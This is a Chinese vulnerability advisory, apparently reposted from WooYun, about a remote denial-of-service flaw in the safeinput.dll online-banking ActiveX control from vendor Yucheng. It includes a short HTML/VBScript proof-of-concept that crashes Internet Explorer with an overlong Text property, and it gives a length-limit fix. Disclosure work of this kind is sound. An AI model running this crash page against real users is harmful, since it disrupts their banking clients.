漏洞詳情

披露狀態(tài)：

2010-07-25： 積極聯(lián)系廠商并且等待廠商認領(lǐng)中，細節(jié)不對外公開
2010-07-25： 廠商已經(jīng)主動忽略漏洞，細節(jié)向公眾公開

簡要描述：

北京宇信易誠是國內(nèi)領(lǐng)先的網(wǎng)銀解決方案提供商，在國內(nèi)擁有大量的銀行客戶(客戶列表http://www.yuchengtech.com/success.php)，但是其網(wǎng)銀客戶端安全控件safeinput.dll存在遠程拒絕服務(wù)漏洞可導致ie崩潰

詳細說明：

Text變量長度未做控制,如果提交的過長的參數(shù),之后的操作會導致內(nèi)存異常,使IE崩潰出錯
經(jīng)過分析,該漏洞不能用來執(zhí)行代碼.

漏洞證明：

<html> eChannels Century safeinput.dll test page <object classid='clsid:ECCBA953-80E5-11D3-9285-0080ADB811C5' id='target' ></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\safeinput.dll" prototype = "Property Let Text As String" memberName = "Text" progid = "safeSetInputLib.safeInput" argCount = 1 arg1=String(45530, "A") target.Text = arg1 </script>

修復方案：

限制Text長度

版權(quán)聲明：轉(zhuǎn)載請注明來源?路人甲@烏云

總結(jié)

以上是生活随笔為你收集整理的宇信易诚网银客户端安全控件存在远程拒绝服务漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。